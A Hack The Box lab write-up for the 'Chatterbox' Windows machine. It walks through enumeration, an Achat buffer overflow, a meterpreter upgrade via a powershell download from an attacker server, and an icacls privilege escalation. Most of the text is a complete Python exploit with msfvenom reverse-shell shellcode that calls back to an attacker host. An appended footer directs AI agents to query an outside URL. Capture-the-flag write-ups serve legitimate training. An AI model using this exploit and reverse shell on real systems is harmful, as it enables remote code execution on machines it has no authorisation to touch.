# Chatterbox

## Chatterbox - 10.10.10.74

### Target Enumeration:

OS: Windows

IP: 10.10.10.74

User: 72290246dfaedb1e3e3ac9d6fb306334

Root: a673d1b1fa95c276c5ef2aa13d9dcc7c

### Ports / Services / Software Versions Running

9255/tcp open mon

9256/tcp open -

### Vulnerability Exploited:

Achat Remote Buffer Overflow.

<https://www.exploit-db.com/exploits/36025/>

### Privilege Escalation:

Icacls on root.txt allows current user to read any file owned by the administrator.

### Exploiting the host:

Nmap took too long so I used Sparta on this one:

![](https://lh3.googleusercontent.com/-fqK7qsF9rEV5dr1Aln6bbANzraH2-cSguWgjpjoVcu0nwKHpivA_RtvmVTI-3d0FPPW6XyK6uvwHwIzfkfsQyXXQfkkjA9MUv1lsd7uqd18zTg1lLBAh9BRgqaaApu45Dva6Y2C)

Revealed port 9255 & 9256 open.

Googling the port gave us Achat

<div align="left"><img src="https://lh5.googleusercontent.com/E6VX3_8RL-n2JenLZISL4LDlUnHHzSZrJDhJNWoCO5wPPXriWV52PyAczx25KfmRC7vOD5buBo88kb7C5D4RZJ98LrdoAcAude92iJuRaOoWOWH9bykcuGlnX1Mwzu5VXnMRUCIq" alt=""></div>

That is a really buggy metasploit exploit so we found a better one online:

<https://www.exploit-db.com/exploits/36025/>

Generate your shellcode

![](https://lh5.googleusercontent.com/HxO8OtvKjcLO-wJK7HjmLpyYW6nFHDCoD3Z0c9kxzkRuaLeHZrsur6LzN5d0krzWzm3N6MAaD04xLsQobueMKKYqAwkvI8sszHu3dbv2bk6pBImo2ImfIt_zGXLkJZD6Fg2TfEHn)

Paste that into the script so it looks as follows:

![](https://lh4.googleusercontent.com/Vwg-z5vRhbF0xWqoILbHMb3cpSK6Wh9fuxdb9-14TvU5lZhUXFUcKNdxf1DRGFTsX_wV4fnxvDtkkuBM5DIi5TRVGYd8RHdA0oUbnlbkDcGi1_0DEF4u91Ar_-V0kovhxQ_bI7Jj)

```
#!/usr/bin/python
# Author KAhara MAnhara - modified
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x47\x78\x53\x52"
buf += "\x4d\x30\x4d\x30\x59\x70\x43\x30\x45\x39\x6b\x35\x6e"
buf += "\x51\x55\x70\x71\x54\x72\x6b\x72\x30\x6c\x70\x54\x4b"
buf += "\x4f\x62\x7a\x6c\x72\x6b\x42\x32\x6e\x34\x44\x4b\x30"
buf += "\x72\x6b\x78\x6a\x6f\x37\x47\x6d\x7a\x4f\x36\x30\x31"
buf += "\x69\x6f\x66\x4c\x6f\x4c\x51\x51\x51\x6c\x59\x72\x4e"
buf += "\x4c\x6b\x70\x79\x31\x46\x6f\x4c\x4d\x49\x71\x57\x57"
buf += "\x79\x52\x39\x62\x4e\x72\x32\x37\x52\x6b\x30\x52\x4a"
buf += "\x70\x32\x6b\x4e\x6a\x4f\x4c\x72\x6b\x4e\x6c\x4b\x61"
buf += "\x71\x68\x69\x53\x6e\x68\x79\x71\x68\x51\x32\x31\x62"
buf += "\x6b\x50\x59\x6b\x70\x59\x71\x46\x73\x74\x4b\x61\x39"
buf += "\x7a\x78\x5a\x43\x6e\x5a\x6d\x79\x34\x4b\x30\x34\x74"
buf += "\x4b\x49\x71\x57\x66\x30\x31\x49\x6f\x74\x6c\x56\x61"
buf += "\x46\x6f\x6c\x4d\x59\x71\x69\x37\x4e\x58\x67\x70\x70"
buf += "\x75\x69\x66\x49\x73\x53\x4d\x39\x68\x4f\x4b\x71\x6d"
buf += "\x6b\x74\x73\x45\x37\x74\x51\x48\x54\x4b\x6f\x68\x6f"
buf += "\x34\x79\x71\x5a\x33\x32\x46\x44\x4b\x6a\x6c\x30\x4b"
buf += "\x52\x6b\x71\x48\x6d\x4c\x39\x71\x56\x73\x72\x6b\x6c"
buf += "\x44\x32\x6b\x6d\x31\x48\x50\x31\x79\x4d\x74\x6f\x34"
buf += "\x6e\x44\x4f\x6b\x31\x4b\x70\x61\x31\x49\x71\x4a\x52"
buf += "\x31\x6b\x4f\x47\x70\x51\x4f\x71\x4f\x70\x5a\x34\x4b"
buf += "\x4c\x52\x58\x6b\x72\x6d\x4f\x6d\x4f\x78\x30\x33\x50"
buf += "\x32\x79\x70\x69\x70\x53\x38\x52\x57\x73\x43\x50\x32"
buf += "\x31\x4f\x61\x44\x32\x48\x50\x4c\x30\x77\x4f\x36\x7a"
buf += "\x67\x6b\x4f\x36\x75\x36\x58\x62\x70\x49\x71\x59\x70"
buf += "\x49\x70\x6f\x39\x35\x74\x6f\x64\x32\x30\x43\x38\x4b"
buf += "\x79\x63\x50\x30\x6b\x4b\x50\x79\x6f\x48\x55\x42\x30"
buf += "\x70\x50\x42\x30\x42\x30\x51\x30\x62\x30\x61\x30\x6e"
buf += "\x70\x63\x38\x39\x5a\x7a\x6f\x79\x4f\x49\x50\x69\x6f"
buf += "\x78\x55\x45\x47\x32\x4a\x69\x75\x31\x58\x49\x7a\x4a"
buf += "\x6a\x6a\x6e\x6b\x58\x33\x38\x39\x72\x49\x70\x4a\x61"
buf += "\x65\x6b\x72\x69\x49\x56\x70\x6a\x4a\x70\x6f\x66\x51"
buf += "\x47\x70\x68\x44\x59\x46\x45\x53\x44\x43\x31\x59\x6f"
buf += "\x5a\x35\x35\x35\x59\x30\x62\x54\x6a\x6c\x49\x6f\x4e"
buf += "\x6e\x4c\x48\x44\x35\x78\x6c\x43\x38\x78\x70\x74\x75"
buf += "\x65\x52\x42\x36\x79\x6f\x79\x45\x62\x48\x30\x63\x52"
buf += "\x4d\x52\x44\x79\x70\x32\x69\x68\x63\x6f\x67\x4f\x67"
buf += "\x71\x47\x4c\x71\x7a\x56\x42\x4a\x6a\x72\x50\x59\x6e"
buf += "\x76\x49\x52\x4b\x4d\x42\x46\x35\x77\x31\x34\x6c\x64"
buf += "\x4d\x6c\x5a\x61\x6d\x31\x44\x4d\x31\x34\x4e\x44\x4a"
buf += "\x70\x76\x66\x6b\x50\x4e\x64\x51\x44\x30\x50\x6e\x76"
buf += "\x31\x46\x30\x56\x31\x36\x50\x56\x70\x4e\x50\x56\x72"
buf += "\x36\x71\x43\x51\x46\x42\x48\x43\x49\x68\x4c\x4f\x4f"
buf += "\x62\x66\x6b\x4f\x76\x75\x74\x49\x59\x50\x6e\x6e\x62"
buf += "\x36\x51\x36\x59\x6f\x30\x30\x33\x38\x79\x78\x53\x57"
buf += "\x4b\x6d\x51\x50\x4b\x4f\x78\x55\x45\x6b\x4c\x30\x76"
buf += "\x55\x35\x52\x70\x56\x62\x48\x63\x76\x34\x55\x77\x4d"
buf += "\x33\x6d\x49\x6f\x4a\x35\x4d\x6c\x4b\x56\x73\x4c\x7a"
buf += "\x6a\x53\x50\x39\x6b\x79\x50\x71\x65\x7a\x65\x67\x4b"
buf += "\x70\x47\x6d\x43\x62\x52\x32\x4f\x4f\x7a\x69\x70\x42"
buf += "\x33\x4b\x4f\x37\x65\x41\x41"

# Create a UDP socket - Change this host!!!
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
```

Execute

<div align="left"><img src="https://lh3.googleusercontent.com/Nx_PqfYjsNxq3AoZcHagdU5_HnexbdWTMpcR5FBIP86iV6I-aGgjp9kAxu8Dv4mgGJc3lFvg88IXylG6YuaPbNGACxVKhUTDLKKQvifcDkQZoITqaxcfsd5_BBhy152G_0X6LBhL" alt=""></div>

Now you have a shell

![](https://lh3.googleusercontent.com/arJDkm8nRpcOq2zRvwMq2pvtHM1GXb1p7uV62-KOanUSgay7hABYCzHKYxwSSAESFSCUNk5_fXBS1x26AObjcsehp-_z_vT0iCAENPlyYRVZxYnDCJs4riZmhIO6D3TxL8S9MEnZ)

Upgrade your shell to meterpreter as it is windows 7 we will use powershell to download it.

Generate a shell with msfvenom

![](https://lh3.googleusercontent.com/6QaMvyAsg8eGDbCHof3UCybA5WGJRgN7EVGV0j9KsajsvNeIKYIZAUFZ6-MlQ2AoMKvL4KPLErVmsssjVl8ZjfYE5uwaG47G_M6HJHKi3HXBmbHSAW1EoEUMAoMWhkfeEgzshH8n)

Start your python web server and a metasploit listener

Download the file with the following commands and execute it.

![](https://lh3.googleusercontent.com/pZWIPrYUBBeu1QVtczrC3ZW8DdmG5G-i-iS8-QsXIYHkj8WoW6SGLCQVITJO8h3GJSWwktVwXe87kca9v8shnekILJWuk54bff222Ixl_LMNeoiYv7sLT4jhn_F_BgyFWYZceoLy)

Now you have a meterpreter shell

![](https://lh6.googleusercontent.com/AChsp0AWBPO8bZLeu6SACsorx0FUonLkjiAirLjwKoVfrXiXtGX22Al9XI6WK0kykFVSC0TjfgDN9Z3zFZhkZIr4rzFbNO7NYef89KIqN8QOxSpKUBWTJ6l8Mu_NCu7soNCp7Ghc)

Enumerating the system show you that you can access the administrators desktop but cannot read the file.

Use the following command to assign ownership to alfred and collect the root flag.

![](https://lh3.googleusercontent.com/3DhZcwa_3MHSR3Aiq-4INOR8y8HEadskSWr5Nt2XTcoeXWX5kBFjnkoSHplf8kIIFhfEfGo3y16rqxfHGN4C2LbMbS7F9Ibse2c_GhTYP3wSHvu4sEVK9N5YWCJKyskVk4pfX8bh)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/chatterbox.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.